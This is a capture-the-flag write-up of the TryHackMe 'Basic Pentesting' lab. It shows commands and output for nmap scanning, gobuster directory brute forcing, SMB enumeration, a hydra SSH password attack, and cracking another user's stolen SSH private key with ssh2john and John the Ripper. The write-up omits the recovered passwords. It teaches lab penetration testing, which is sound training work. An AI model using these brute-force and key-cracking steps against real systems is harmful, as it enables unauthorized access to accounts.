Description from THM
This is a machine that allows you to practice web app hacking and privilege escalation.
This is a beginner friendly room on TryHackMe. There are several tasks in this CTF that needs to be completed, which I'll answer them along the way. The purpose of this machine is to learn brute forcing, hash cracking, service enumeration, and Linux enumeration.
Tools
- Nmap
- gobuster
- enum4linux
- ssh2john
- John the Ripper
Task 1
This task is to just deploy the machine and connect to the THM network.
Task 2
The first thing we're going to do is run an Nmap scan of the target machine to find what services are running on it.
nmap -sC -sV -oA basic 10.10.195.240
Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 04:57 GMT
Nmap scan report for ip-10-10-195-240.eu-west-1.compute.internal (10.10.195.240)
Host is up (0.0015s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
MAC Address: 02:37:12:F3:96:43 (Unknown)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are several open ports:
- Port 22 - SSH
- Port 80 - HTTP (Apache httpd 2.4.18)
- Port 139 & 445 - SMB
- Port 8009 - ajp13 (Apache Jserv)
- Port 8080 - HTTP (Apache Tomcat)
They are all pretty interesting, but for now let's focus on the web service first on Port 80 and see what we can find.
Task 3
For this task, we'll need to find the hidden directory on the web server.
If we try to go to the webpage, all we see is a message that says "Undergoing maintenance":
To find the hidden directories, we'll use a tool called gobuster. It is used to look for directories and files on a website using brute force.
To use gobuster, I'm going to run the following command:
gobuster dir -u http://<ip>:80 -w /usr/share/wordlist/dirb/common.txt
- gobuster - starts the tool
- dir - used to bruteforce directory/files
- -u - the target URL
- -w - path to the wordlist
gobuster dir -u http://10.10.195.240:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.195.240:80
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/03/12 05:24:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/12 05:24:34 Finished
===============================================================
All the directories besides /development
and /index.html
are forbidden (Status: 403
means that it is forbidden). index.html
is just the main page we saw that said "Undergoing maintenance". This leaves us with /development
to explore.
As we can see, there are two text files on the page. If we click on dev.txt
we get this, which looks to be some developer's notes. Seems as though there are two people communicating with each other using this text file. Someone with the initials of K and J:
With further inspection, the person with the initial "K" was messing around with struts and that they are using version 2.5.12. If we google struts 2.5.12, the first result shows an exploit from exploitdb! It is called:
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
We'll keep this in mind, because this is useful information. Now, let's check the other text file, j.txt
:
It's a message from "K" to "J", telling them to fix the weak credentials in the /etc/shadow
file.
Tasks 4-7
We've discovered quite a bit by enumerating the web server, but let's continue. We still need to try and enumerate smb (samba).
A tool that we can use to enumerate smb is enum4linux. It is used to enumerate data from Windows and Samba hosts. We can use the following command:
enum4linux <machine ip>
After we run enum4linux, we can go through it and see what we can find that is useful.
We found two users kay
and jan
. This explains the "K" and "J" in the text files earlier. Now we need to figure out the password of the two users found. Let's use hydra to brute force the user's password by using a dictionary attack.
Also, make note from earlier, Kay told Jan that their password is weak. So, we can assume that Jan has a weak password that we can hopefully find using hydra.
We'll use the following command (it will take a bit to complete):
hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.240
- hydra - starts the tool
- -t - sets the thread to 6
- -l - sets user (in this case jan)
- -P - path to wordlist
- ssh:// - remember from the nmap scan the target is running ssh. So, this will brute force the ssh login.
[22][ssh] host: 10.10.195.240 login: jan password: <password here>
I've omitted the password because I believe in attempting it yourself. If you've done the enumerating and scans correctly you should get the same results.
We have the password, so let's trying logging in with SSH using our newly found credentials.
We will use the following command to login:
ssh jan@<ip>
jan@basic2:~$ whoami
jan
Tasks 8-11
We'll need to further enumerate the machine to find any vectors for privilege escalation.
Let's look around and see what we can find.
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
Kay's files look promising! Let's continue to look through.
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
Looking in the .ssh
folder we can see there is Kay's public key. We can copy the key and attempt to crack it using John the Ripper, however, we'll need to specifically use ssh2john first. This is because we need to convert the id_rsa file to hash format so we can use it with john.
We'll use the following command to convert id_rsa to hash format (my file location may be different from yours. I'm using the THM AttackBox for this, so it might be different on Kali or you'll need to install it):
python3 /opt/john/ssh2john.py id_rsa > id_rsa.hash
Now we can run john:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
<password here> (id_rsa)
1g 0:00:00:09 DONE (2022-03-12 06:51) 0.1086g/s 1558Kp/s 1558Kc/s
Session completed.
We have Kay's password! Let's login as Kay now.
jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@10.10.195.240
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.195.240 (10.10.195.240)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':
Where it says Enter passphrase
, we'll enter the one we just found for Kay. After doing so, we now have access as Kay.
kay@basic2:~$ whoami
kay
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
<final password here>
We're done! We found the final password!
Summary
After solving this TryHackMe machine we learned how to scan our target machine to look for any services that were running on it. We used what we found to enumerate the web server, SMB, and SSH. We got a chance to use brute forcing tools to continute enumerating the target machine. The vulnerabilities we discovered were that Apache Struts, however, we didn't end up dealing with that, but that was a cool find. We also discovered text files that weren't for our eyes to see. Then, we dealt with weak passwords, which gave us a chance to practice password cracking. In the end, using the information we found we were able to escalate our privileges.